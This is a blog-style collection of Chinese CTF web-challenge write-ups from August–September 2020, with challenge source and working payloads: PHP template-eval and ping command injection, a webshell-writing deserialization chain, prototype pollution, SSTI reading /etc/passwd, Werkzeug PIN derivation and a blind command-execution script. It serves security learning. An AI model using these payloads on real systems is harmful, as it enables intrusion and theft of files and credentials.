title: 20208月到9月初的wp合集
date: 2020-09-12 15:05:07
categories:

ctf_wp
tags:
web
misc
ctf
第十三届全国大学生信息安全竞赛-创新实践能力赛
第四届强网杯
GACTF
🐏城杯
🎣杯
DDCTF
WMCTF
其他
toc: true

第十三届全国大学生信息安全竞赛-创新实践能力赛

web

fork

<?php
    //题目环境：php:7.4.8-apache
    $pid = pcntl_fork();
    if ($pid == -1) {
        die('could not fork');
    }else if ($pid){
        $r=pcntl_wait($status);  // pcntl_wifexited 等待或返回fork的子进程状态
        if(!pcntl_wifexited($status)){  
            phpinfo();
        }
    }else{
        highlight_file(__FILE__);
        if(isset($_GET['a'])&&is_string($_GET['a'])&&!preg_match("/[:\\\\]|exec|pcntl/i",$_GET['a'])){
            call_user_func_array($_GET['a'],[$_GET['b'],false,true]);
        }
        posix_kill(posix_getpid(), SIGUSR1);
    }

# http://eci-2ze9505q64pi1umrxpn7.cloudeci1.ichunqiu.com/?a=call_user_func&b=pcntl_wait

rceme

https://www.anquanke.com/post/id/173991

https://xz.aliyun.com/t/4471

<?php
error_reporting(0);
highlight_file(__FILE__);
parserIfLabel($_GET['a']);
function danger_key($s) {
    $s=htmlspecialchars($s);
    $key=array('php','preg','server','chr','decode','html','md5','post','get','request','file','cookie','session','sql','mkdir','copy','fwrite','del','encrypt','

#039;,'system','exec','shell','open','ini_','chroot','eval','passthru','include','require','assert','union','create','func','symlink','sleep','ord','str','source','rev','base_convert'); $s = str_ireplace($key,"*",$s); $danger=array('php','preg','server','chr','decode','html','md5','post','get','request','file','cookie','session','sql','mkdir','copy','fwrite','del','encrypt','

#039;,'system','exec','shell','open','ini_','chroot','eval','passthru','include','require','assert','union','create','func','symlink','sleep','ord','str','source','rev','base_convert'); foreach ($danger as $val){ if(strpos($s,$val) !==false){ die('很抱歉，执行出错，发现危险字符【'.$val.'】'); } } if(preg_match("/^[a-z]$/i")){ die('很抱歉，执行出错，发现危险字符'); } return $s; } function parserIfLabel( $content ) { $pattern = '/\{if:([\s\S]+?)}([\s\S]*?){end\s+if}/'; if ( preg_match_all( $pattern, $content, $matches ) ) { $count = count( $matches[ 0 ] ); for ( $i = 0; $i < $count; $i++ ) { $flag = ''; $out_html = ''; $ifstr = $matches[ 1 ][ $i ]; $ifstr=danger_key($ifstr,1); if(strpos($ifstr,'=') !== false){ $arr= splits($ifstr,'='); if($arr[0]=='' || $arr[1]==''){ die('很抱歉，模板中有错误的判断,请修正【'.$ifstr.'】'); } $ifstr = str_replace( '=', '==', $ifstr ); } $ifstr = str_replace( '<>', '!=', $ifstr ); $ifstr = str_replace( 'or', '||', $ifstr ); $ifstr = str_replace( 'and', '&&', $ifstr ); $ifstr = str_replace( 'mod', '%', $ifstr ); $ifstr = str_replace( 'not', '!', $ifstr ); if ( preg_match( '/\{|}/', $ifstr)) { die('很抱歉，模板中有错误的判断,请修正'.$ifstr); }else{ @eval( 'if(' . $ifstr . '){$flag="if";}else{$flag="else";}' ); } if ( preg_match( '/([\s\S]*)?\{else\}([\s\S]*)?/', $matches[ 2 ][ $i ], $matches2 ) ) { switch ( $flag ) { case 'if': if ( isset( $matches2[ 1 ] ) ) { $out_html .= $matches2[ 1 ]; } break; case 'else': if ( isset( $matches2[ 2 ] ) ) { $out_html .= $matches2[ 2 ]; } break; } } elseif ( $flag == 'if' ) { $out_html .= $matches[ 2 ][ $i ]; } $pattern2 = '/\{if([0-9]):/'; if ( preg_match( $pattern2, $out_html, $matches3 ) ) { $out_html = str_replace( '{if' . $matches3[ 1 ], '{if', $out_html ); $out_html = str_replace( '{else' . $matches3[ 1 ] . '}', '{else}', $out_html ); $out_html = str_replace( '{end if' . $matches3[ 1 ] . '}', '{end if}', $out_html ); $out_html = $this->parserIfLabel( $out_html ); } $content = str_replace( $matches[ 0 ][ $i ], $out_html, $content ); } } return $content; } function splits( $s, $str=',' ) { if ( empty( $s ) ) return array( '' ); if ( strpos( $s, $str ) !== false ) { return explode( $str, $s ); } else { return array( $s ); } } /?a={if:var_dump(('sys'.'tem')('cat /flag'))}a{end if}

littlegame

CVE-2019-10747,此题使用的是有问题的版本。

set-value 的版本比较: https://github.com/jonschlinkert/set-value/commit/95e9d9923f8a8b4a01da1ea138fcc39ec7b6b15f

POC:

https://snyk.io/vuln/SNYK-JS-SETVALUE-450213

https://xz.aliyun.com/t/7182####toc-4

var express = require('express');
const setFn = require('set-value');
var router = express.Router();

const Admin = {
    "password1":process.env.p1,
    "password2":process.env.p2,
    "password3":process.env.p3
}

router.post("/DeveloperControlPanel", function (req, res, next) {
    // not implement
    if (req.body.key === undefined || req.body.password === undefined){
        res.send("What's your problem?");
    }else {
        let key = req.body.key.toString();
        let password = req.body.password.toString();
        if(Admin[key] === password){
            res.send(process.env.flag);
        }else {
            res.send("Wrong password!Are you Admin?");
        }
    }

});
router.get('/SpawnPoint', function (req, res, next) {
    req.session.knight = {
        "HP": 1000,
        "Gold": 10,
        "Firepower": 10
    }
    res.send("Let's begin!");
});
router.post("/Privilege", function (req, res, next) {
    // Why not ask witch for help?
    if(req.session.knight === undefined){
        res.redirect('/SpawnPoint');
    }else{
        if (req.body.NewAttributeKey === undefined || req.body.NewAttributeValue === undefined) {
            res.send("What's your problem?");
        }else {
            let key = req.body.NewAttributeKey.toString();
            let value = req.body.NewAttributeValue.toString();
            setFn(req.session.knight, key, value);
            res.send("Let's have a check!");
        }
    }
});

module.exports = router;

/SpawnPoint
/Privilege

{"NewAttributeKey":"__proto__.fe1w0","NewAttributeValue":"xzaslxr1"}

/DeveloperControlPanel

{"key":"fe1w0","password":"xzaslxr1"}

题外话,在Y1ng师傅博客那边又学到个新知识

npm aduit主要做的就是把需要检查的依赖信息发送给一个官方检查接口, 该结构会在历史上报的漏洞数据库中判断当前依赖信息是否含有漏洞，然后生成一个包含包名称、漏洞严重性、简介、路径等的漏洞报告反馈给开发者。

题目源代码:http://xzaslxr.xyz/wp-content/uploads/2020/09/LittleGame_app.zip 感兴趣的老哥,可以试试

easytrick

<?php
class trick{
    public $trick1;
    public $trick2;
    public function __destruct(){
        $this->trick1 = (string)$this->trick1;
        if(strlen($this->trick1) > 5 || strlen($this->trick2) > 5){
            die("你太长了");
        }
        if($this->trick1 !== $this->trick2 && md5($this->trick1) === md5($this->trick2) && $this->trick1 != $this->trick2){
            echo file_get_contents("/flag");
        }
    }
}
highlight_file(__FILE__);
unserialize($_GET['trick']);

可以利用php 的无穷大来绕过

O:5:"trick":2:{s:6:"trick1";d:INF;s:6:"trick2";d:INF;}

论证:

此外,利用NaN也行 from Y1ng 师傅wp

NaN “不是数字”并不意味着查看数据类型是否为数值型/文本型/等等。
NaN实际上是一组可以存储在浮点变量中的值，但实际上并不计算为一个合适的浮点数。

php > var_dump(is_nan((float)'NaN'));
php shell code:1:
bool(false)

babyunserialize

思路与wm2020的webweb相似,不同的是通过写webshell

而非rce。

<?php
namespace DB;
class Jig
{
    protected
        $dir = 1,
        $data = array("fe1w0.php"=>array("<?php eval(\$_GET['a']);?>"=>123)),
        $lazy = 1;
}
$a=new Jig();
echo urlencode((serialize($a)));

主要利用jip.php中的函数

    function write($file,array $data=NULL) {
        if (!$this->dir || $this->lazy)
            return count($this->data[$file]=$data);
        $fw=\Base::instance();
        switch ($this->format) {
            case self::FORMAT_JSON:
                $out=json_encode($data,JSON_PRETTY_PRINT);
                break;
            case self::FORMAT_Serialized:
                $out=$fw->serialize($data);
                break;
        }
        return $fw->write($this->dir.$file,$out);
    }

    function __destruct() {
        if ($this->lazy) {
            $this->lazy = FALSE;
            foreach ($this->data?:[] as $file => $data)
                $this->write($file,$data);
        }
    }

🎣杯

web

gamebox

<?php
if(isset($_GET['c'])) {
    gamebox($_GET['c']);  //没有get到这个是干什么用的
}
else if(isset($_GET['f'])){
    fileReader($_GET['f']);// 可以用来读取文件,php格式的也行
}
else{
    highlight_file(__FILE__);
}

读进程信息

GET /?f=/proc/self/maps HTTP/1.1
Host: 122.112.218.163:10080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4231.0 Safari/537.36 Edg/86.0.615.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

HTTP/1.1 200 OK
Date: Thu, 27 Aug 2020 01:35:12 GMT
Server: Apache/2.4.38 (Debian)
X-Powered-By: PHP/7.2.33
Vary: Accept-Encoding
Content-Length: 53572
Connection: close
Content-Type: text/html; charset=UTF-8

55f1df1ed000-55f1df222000 r--p 00000000 fd:01 664673                     /usr/sbin/apache2
55f1df222000-55f1df26c000 r-xp 00035000 fd:01 664673                     /usr/sbin/apache2
55f1df26c000-55f1df28e000 r--p 0007f000 fd:01 664673                     /usr/sbin/apache2
55f1df28f000-55f1df292000 r--p 000a1000 fd:01 664673                     /usr/sbin/apache2
55f1df292000-55f1df296000 rw-p 000a4000 fd:01 664673                     /usr/sbin/apache2
55f1df296000-55f1df299000 rw-p 00000000 00:00 0 
55f1dfbca000-55f1dfdb1000 rw-p 00000000 00:00 0                          [heap]
55f1dfdb1000-55f1dfdd6000 rw-p 00000000 00:00 0                          [heap]
7f40c85b0000-7f40c85b1000 r--p 00000000 fd:01 664640                     /usr/lib/x86_64-linux-gnu/libicudata.so.63.1
7f40c85b1000-7f40c85b2000 r-xp 00001000 fd:01 664640                     /usr/lib/x86_64-linux-gnu/libicudata.so.63.1
7f40c85b2000-7f40c9f9e000 r--p 00002000 fd:01 664640                     /usr/lib/x86_64-linux-gnu/libicudata.so.63.1
7f40c9f9e000-7f40c9f9f000 r--p 019ed000 fd:01 664640                     /usr/lib/x86_64-linux-gnu/libicudata.so.63.1
7f40c9f9f000-7f40c9fa0000 rw-p 019ee000 fd:01 664640                     /usr/lib/x86_64-linux-gnu/libicudata.so.63.1
7f40c9fa0000-7f40c9fc7000 rw-p 00000000 00:00 0 
7f40c9fc7000-7f40c9fca000 r--p 00000000 fd:01 529216                     /lib/x86_64-linux-gnu/libnss_files-2.28.so
7f40c9fca000-7f40c9fd1000 r-xp 00003000 fd:01 529216                     /lib/x86_64-linux-gnu/libnss_files-2.28.so
7f40c9fd1000-7f40c9fd3000 r--p 0000a000 fd:01 529216                     /lib/x86_64-linux-gnu/libnss_files-2.28.so
7f40c9fd3000-7f40c9fd4000 ---p 0000c000 fd:01 529216                     /lib/x86_64-linux-gnu/libnss_files-2.28.so
7f40c9fd4000-7f40c9fd5000 r--p 0000c000 fd:01 529216                     /lib/x86_64-linux-gnu/libnss_files-2.28.so
7f40c9fd5000-7f40c9fd6000 rw-p 0000d000 fd:01 529216                     /lib/x86_64-linux-gnu/libnss_files-2.28.so
7f40c9fd6000-7f40ca00c000 rw-p 00000000 00:00 0 
7f40ca014000-7f40ca016000 rw-p 00000000 00:00 0 
7f40ca907000-7f40ca90a000 r--p 00000000 fd:01 529194                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f40ca90a000-7f40ca91b000 r-xp 00003000 fd:01 529194                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f40ca91b000-7f40ca91e000 r--p 00014000 fd:01 529194                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f40ca91e000-7f40ca91f000 ---p 00017000 fd:01 529194                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f40ca91f000-7f40ca920000 r--p 00017000 fd:01 529194                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f40ca920000-7f40ca921000 rw-p 00018000 fd:01 529194                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f40ca921000-7f40ca9aa000 r--p 00000000 fd:01 529944                     /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25
7f40ca9aa000-7f40caa56000 r-xp 00089000 fd:01 529944                     /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25
7f40caa56000-7f40caa94000 r--p 00135000 fd:01 529944                     /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25
7f40caa94000-7f40caa95000 ---p 00173000 fd:01 529944                     /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25
7f40caa95000-7f40caa9f000 r--p 00173000 fd:01 529944                     /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25
7f40caa9f000-7f40caaa1000 rw-p 0017d000 fd:01 529944                     /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25
7f40caaa1000-7f40caaa5000 rw-p 00000000 00:00 0 
7f40cb5fb000-7f40cb5fe000 r-xp 00000000 fd:01 787516                     /usr/local/lib/php/extensions/no-debug-non-zts-20170718/FileReader.so
7f40cb5fe000-7f40cb7fe000 ---p 00003000 fd:01 787516                     /usr/local/lib/php/extensions/no-debug-non-zts-20170718/FileReader.so
7f40cb7fe000-7f40cb7ff000 r--p 00003000 fd:01 787516                     /usr/local/lib/php/extensions/no-debug-non-zts-20170718/FileReader.so
7f40cb7ff000-7f40cb800000 rw-p 00004000 fd:01 787516                     /usr/local/lib/php/extensions/no-debug-non-zts-20170718/FileReader.so

FileReader.so 下载

 curl.exe http://122.112.218.163:10080/?f=/usr/local/lib/php/extensions/no-debug-non-zts-20170718/FileReader.so --output D:1.so

当你IDA启动时,会发现这是道webpwn

gamebox

__int64 __fastcall zif_gamebox(__int64 a1)
{
  signed int v1; // edx@4
  int v2; // esi@6
  char *v3; // rax@6
  __int64 v4; // rcx@6
  const void *v6; // [sp+0h] [bp-E78h]@1
  __int64 v7; // [sp+8h] [bp-E70h]@1
  int v8[256]; // [sp+10h] [bp-E68h]@4
  __int64 v9[256]; // [sp+410h] [bp-A68h]@4
  char v10[511]; // [sp+C10h] [bp-268h]@1
  char v11; // [sp+E0Fh] [bp-69h]@4
  __int64 v12; // [sp+E58h] [bp-20h]@1

  v6 = 0LL;
  v12 = *MK_FP(__FS__, 40LL);
  memset(v10, 0, 0x240uLL);
  if ( zend_parse_parameters(*(_DWORD *)(a1 + 44), (__int64)"s", (__int64)&v6, (__int64)&v7) != -1 )
  {
    if ( (unsigned __int64)v7 > 0x200 )
      qmemcpy(v10, v6, 0x200uLL);
    else
      __memcpy_chk((__int64)v10, (__int64)v6, v7, 576LL);
    v11 = 0;
    v1 = 0;
    qmemcpy(v8, &unk_2900, sizeof(v8));
    qmemcpy(v9, &off_2040A0, sizeof(v9));
    while ( 1 )
    {
      v2 = v1 + 1;
      v3 = &v10[v1];
      v4 = *v3;
      if ( (_BYTE)v4 == 44 )
      {
        v1 += 2;
        *v3 = 5;
        if ( v1 > 511 )
LABEL_8:
          JUMPOUT(__CS__, v9[v10[0]]);
      }
      else
      {
        *v3 = v8[v4];
        ++v1;
        if ( v2 > 511 )
          goto LABEL_8;
      }
    }
  }
  return *MK_FP(__FS__, 40LL) ^ v12;
}

fileReader

__int64 __fastcall zif_fileReader(__int64 a1)
{
  __int64 v1; // rdi@1
  char *v2; // r8@2
  const char *v3; // rsi@4
  FILE *v4; // rbx@4
  char *v6; // rax@10
  __int64 v7; // [sp+0h] [bp-B8h]@1
  __int64 v8; // [sp+8h] [bp-B0h]@1
  char filename[16]; // [sp+10h] [bp-A8h]@2
  __m128i v10; // [sp+20h] [bp-98h]@3
  __m128i v11; // [sp+30h] [bp-88h]@3
  __m128i v12; // [sp+40h] [bp-78h]@3
  __m128i v13; // [sp+50h] [bp-68h]@3
  __m128i v14; // [sp+60h] [bp-58h]@3
  __m128i v15; // [sp+70h] [bp-48h]@3
  __m128i v16; // [sp+80h] [bp-38h]@3
  __int64 v17; // [sp+98h] [bp-20h]@1

  v1 = *(_DWORD *)(a1 + 44);
  v17 = *MK_FP(__FS__, 40LL);
  v7 = 0LL;
  if ( zend_parse_parameters(v1, (__int64)"s", (__int64)&v7, (__int64)&v8) != -1 )
  {
    v2 = filename;
    memset(filename, 0, 0x80uLL);
    if ( (unsigned __int64)v8 <= 0x80 )
    {
      LODWORD(v6) = __memcpy_chk((__int64)filename, v7, v8, 128LL);
      v2 = v6;
    }
    else
    {
      *(__m128i *)filename = _mm_loadu_si128((const __m128i *)v7);
      v10 = _mm_loadu_si128((const __m128i *)(v7 + 16));
      v11 = _mm_loadu_si128((const __m128i *)(v7 + 32));
      v12 = _mm_loadu_si128((const __m128i *)(v7 + 48));
      v13 = _mm_loadu_si128((const __m128i *)(v7 + 64));
      v14 = _mm_loadu_si128((const __m128i *)(v7 + 80));
      v15 = _mm_loadu_si128((const __m128i *)(v7 + 96));
      v16 = _mm_loadu_si128((const __m128i *)(v7 + 112));
    }
    v3 = "rb";
    v4 = fopen(v2, "rb");
    if ( v4 )
    {
      while ( !feof(v4) )
      {
        v3 = (const char *)(unsigned int)(char)fgetc(v4);
        php_printf((__int64)"%c", (__int64)v3);
      }
      php_printf((__int64)"\n", (__int64)v3);
    }
    else
    {
      php_printf((__int64)"Failed~", (__int64)"rb");
    }
  }
  return *MK_FP(__FS__, 40LL) ^ v17;
}

easyseed

http://122.112.252.28:20001/index.bak

PHP/5.6.28

***************************
*************************
*************************
*************************
*************************
*************************
*************************
*************************
*************************
$lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
$key = random(16, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
*************************
*************************
*************************
*************************
*************************
*************************
*************************
*************************
function random($length, $chars = '0123456789ABC') {
    $hash = '';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)]; //mt_rand() 使用 Mersenne Twister 算法返回随机整数。

    }
    return $hash;
}
*************************
*************************
*************************
*************************
*************************
*************************
*************************
*************************

参考:

无需暴破还原mt_rand()种子

http://www.yulegeyu.com/2017/05/13/PHPCMS-MT-RAND-SEED-CRACK%E8%87%B4authkey%E6%B3%84%E9%9C%B2%E3%80%82/

https://www.openwall.com/php_mt_seed/

payload

$str = "vEUHaY";
$randStr = "abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ";

for($i=0;$i<strlen($str);$i++){
   $pos = strpos($randStr,$str[$i]);
   echo $pos." ".$pos." "."0 ".(strlen($randStr)-1)." ";
   //整理成方便 php_mt_seed 测试的格式
  //php_mt_seed VALUE_OR_MATCH_MIN [MATCH_MAX [RANGE_MIN RANGE_MAX]]
  //21 21 0 51 30 30 0 51 46 46 0 51 33 33 0 51 0 0 0 51 50 50 0 51
}

seed

root@iZwz951ls2mad25iuv9mtjZ:~/php_mt_seed-4.0# ./php_mt_seed `php 1.php`
Pattern: EXACT-FROM-52 EXACT-FROM-52 EXACT-FROM-52 EXACT-FROM-52 EXACT-FROM-52 EXACT-FROM-52
Version: 3.0.7 to 5.2.0
Found 0, trying 0xe0000000 - 0xffffffff, speed 120.3 Mseeds/s 
Version: 5.2.1+
Found 0, trying 0x00000000 - 0x0fffffff, speed 0.0 Mseeds/s 
seed = 0x000af591 = 718225 (PHP 5.2.1 to 7.0.x; HHVM)
Found 1, trying 0xe0000000 - 0xefffffff, speed 14.8 Mseeds/s 
seed = 0xeed97ca5 = 4007230629 (PHP 5.2.1 to 7.0.x; HHVM)
Found 2, trying 0xf0000000 - 0xffffffff, speed 14.8 Mseeds/s 
Found 2

注意要使用php5.6

payload

$seed  = 718225;
mt_srand($seed);

function random($length, $chars = '') {
    $hash = '';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)]; //mt_rand() 使用 Mersenne Twister 算法返回随机整数。

    }
    return $hash;
}

$lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
$key = random(16, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
//string(6) "vEUHaY"
//string(16) "nRtqGR8mtd9ZOPyI"
var_dump($lock,$key);

GET /index.php HTTP/1.1
Host: 122.112.252.28:20001
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4231.0 Safari/537.36 Edg/86.0.615.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: key=nRtqGR8mtd9ZOPyI; lock=vEUHaY
X-Forwarded-For: 127.0.0.1
Connection: close

HTTP/1.1 200 OK
Date: Thu, 27 Aug 2020 07:30:44 GMT
Server: Apache/2.4.23 (Unix)
X-Powered-By: PHP/5.6.28
Set-Cookie: lock=vEUHaY
Set-Cookie: key=Infer+the+key+from+the+lock
Content-Length: 155
Connection: close
Content-Type: text/html; charset=UTF-8

<h1 align="center">é¥åå¼éçæ¸¸æ!!!</h1><img src="1.jpeg" style="margin-left:38%"/><script>alert('flag{6e5b51029a9a9ccd6d6b0f9a1a58c494}')</script>

easyweb

import requests
import re

flag_format = re.compile('flag\\{[0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12}\\}')
all_letter = '-}0123456789abcdefghijklmnopqrstuvwxyz'

def get_flag(command):
    try:
        r = requests.post('http://119.3.37.185/', data={'cmd': command}, timeout=1.5)
    except:
        return True
    return False

if __name__ == '__main__':
    flag = 'flag{'
    while flag_format.match(flag) == None:
        staus = 0
        for i in all_letter:
            payload = 'cat /flag* | grep %s && sleep 1.8' % (flag + i)
            print(payload)
            if get_flag(payload):
                staus = 1
                flag += i
                print(flag)
                break
        if staus == 0:
            flag = flag[0:-1]

from

无回显的命令执行之利用

https://xz.aliyun.com/t/8125

第四届强网杯

强网先锋

web辅助

源代码:http://112.126.59.156:8080/s/QmfSGNA2JZ7CmK2/download

原题:https://ama666.cn/2020/06/25/DASCTF-6%E6%9C%88%E8%B5%9B%E6%80%BB%E7%BB%93/

payload:

?username=\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0&password="";S:7:"\0*\0pass";O:7:"topsolo":1:{S:7:"\0*\0\6eame";O:7:"midsolo":2:{S:7:"\0*\0\6eame";O:6:"jungle":1:{S:7:"\0*\0\6eame";s:5:"fe1w0";}}};s:8:"\0*\0admin";i:1;}

__wakeup绕过以及 S支持16进制编码就行

主动

 <?php
highlight_file("index.php");

if(preg_match("/flag/i", $_GET["ip"]))
{
    die("no flag");
}

system("ping -c 3 $_GET[ip]");

?>

payload

http://39.96.23.228:10002/?ip=|cat f***| base64

Funhash

<?php
include 'conn.php';
highlight_file("index.php");
//level 1
if ($_GET["hash1"] != hash("md4", $_GET["hash1"]))
{
    die('level 1 failed');
}
// 即 $_GET["hash1"] == hash("md4", $_GET["hash1"])

//level 2
if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['hash2']) !== md5($_GET['hash3']))
{
    die('level 2 failed');
}

//level 3
$query = "SELECT * FROM flag WHERE password = '" . md5($_GET["hash4"],true) . "'";
$result = $mysqli->query($query);
$row = $result->fetch_assoc(); 
var_dump($row);
$result->free();
$mysqli->close();
?>

http://39.101.177.96/?hash1=0e251288019&hash2[]=1&hash3[]=2&hash4=ffifdyop

https://www.cnblogs.com/tqing/p/11852990.html

upload

密码123456

https://www.jianshu.com/p/c3679f805a0c

fe1w0@fe1w0:~$ steghide extract -sf 1.jpg
Enter passphrase: 
the file "flag.txt" does already exist. overwrite ? (y/n) 

steghide: did not write to file "flag.txt".

GACTF

web

simpleflask

http://149.28.80.82:89/

PS C:\WINDOWS\System32> curl.exe -X POST  http://124.70.153.63:80 -d 'name={{1-1}}'
<h1>hello 0!<h1>

name={{().__class__.__bases__[0].__subclasses__()[127].__init__.__globals__.__builtins__["open"]("/etc/machine-id").read()}}

hello a8eb6cac33e701ae867269db5ce80e7f !

name={{().__class__.__bases__[0].__subclasses__()[127].__init__.__globals__.__builtins__["open"]("/proc/self/cgroup").read()}}

hello 11:devices:/docker/62e0150f561bf7328b25f2d50a74e356214194f8e92617818bf90a7b08337c8f 10:blkio:/docker/62e0150f561bf7328b25f2d50a74e356214194f8e92617818bf90a7b08337c8f 9:cpuset:/docker/62e0150f561bf7328b25f2d50a74e356214194f8e92617818bf90a7b08337c8f 8:freezer:/docker/62e0150f561bf7328b25f2d50a74e356214194f8e92617818bf90a7b08337c8f 7:pids:/docker/62e0150f561bf7328b25f2d50a74e356214194f8e92617818bf90a7b08337c8f 6:hugetlb:/docker/62e0150f561bf7328b25f2d50a74e356214194f8e92617818bf90a7b08337c8f 5:net_prio,net_cls:/docker/62e0150f561bf7328b25f2d50a74e356214194f8e92617818bf90a7b08337c8f 4:perf_event:/docker/62e0150f561bf7328b25f2d50a74e356214194f8e92617818bf90a7b08337c8f 3:memory:/docker/62e0150f561bf7328b25f2d50a74e356214194f8e92617818bf90a7b08337c8f 2:cpuacct,cpu:/docker/62e0150f561bf7328b25f2d50a74e356214194f8e92617818bf90a7b08337c8f 1:name=systemd:/docker/62e0150f561bf7328b25f2d50a74e356214194f8e92617818bf90a7b08337c8f !

/usr/local/lib/python3.6/dist-packages/werkzeug/debug/__init__.py 48-76行

def get_machine_id():
    global _machine_id

    if _machine_id is not None:
        return _machine_id

    def _generate():
        linux = b""

        # machine-id is stable across boots, boot_id is not.
        for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id":
            try:
                with open(filename, "rb") as f:
                    value = f.readline().strip()
            except IOError:
                continue

            if value:
                linux += value
                break

        # Containers share the same machine id, add some cgroup
        # information. This is used outside containers too but should be
        # relatively stable across boots.
        try:
            with open("/proc/self/cgroup", "rb") as f:
                linux += f.readline().strip().rpartition(b"/")[2]
        except IOError:
            pass

注意此题和[GYCTF2020]FlaskApp的主要区别在于/etc/machine-id存在,其他一样

linux =  get(/etc/machine-id) + get(/proc/self/cgroup)

注意MAC值是会变化的

name={{().__class__.__bases__[0].__subclasses__()[127].__init__.__globals__.__builtins__["open"]("/sys/class/net/eth0/address").read()}}

hello 02:42:ac:14:00:07 !
>>> print(int('0242ac140007',16))
2485378088967

username

name={{().__class__.__bases__[0].__subclasses__()[127].__init__.__globals__.__builtins__["open"]("/etc/passwd").read()}}

hello root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin messagebus:x:101:101::/nonexistent:/usr/sbin/nologin !

name={{().__class__.__bases__[0].__subclasses__()[127].__init__.__globals__["geteuid"]()}}

hello 0!

变量名	变量值
当前计算机用户名	root
modname	flask.app
getattr(app, “__name“, app.__class.__name__)	Flask
str(uuid.getnode())	a8eb6cac33e701ae867269db5ce80e7f62e0150f561bf7328b25f2d50a74e356214194f8e92617818bf90a7b08337c8f
get_machine_id()	2485378088970
绝对路径	/usr/local/lib/python3.7/dist-packages/flask/app.py

PIN – payload:

import hashlib
from itertools import chain
probably_public_bits = [
    'root',
    'flask.app',
    'Flask',
    '/usr/local/lib/python3.7/dist-packages/flask/app.py',
]

private_bits = [
    '2485378088968',
    'a8eb6cac33e701ae867269db5ce80e7f62e0150f561bf7328b25f2d50a74e356214194f8e92617818bf90a7b08337c8f'
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

shell

>>> import os
>>> os.popen('ls /').read()
'bin\nboot\ndev\netc\nflag\nhome\nlib\nlib64\nmedia\nmnt\nopt\nproc\nroot\nrun\nsbin\nsrv\nsys\ntmp\nusr\nvar\n'  
>>> os.popen('cat /flag').read()
'GACTF{fac9165b6a2b5ac8bd3b99fad0619366}\n'

另一种 payload:

name={{[].__class__.__base__.__subclasses__()[127].__init__.__globals__.__builtins__["open"]("fla".join("/g")).read()}}

EZFLASK

伪源代码

# -*- coding: utf-8 -*-
from flask import Flask, request
import requests
from waf import *
import time
app = Flask(__name__)

@app.route('/ctfhint')
def ctf():
    hint =xxxx # hints
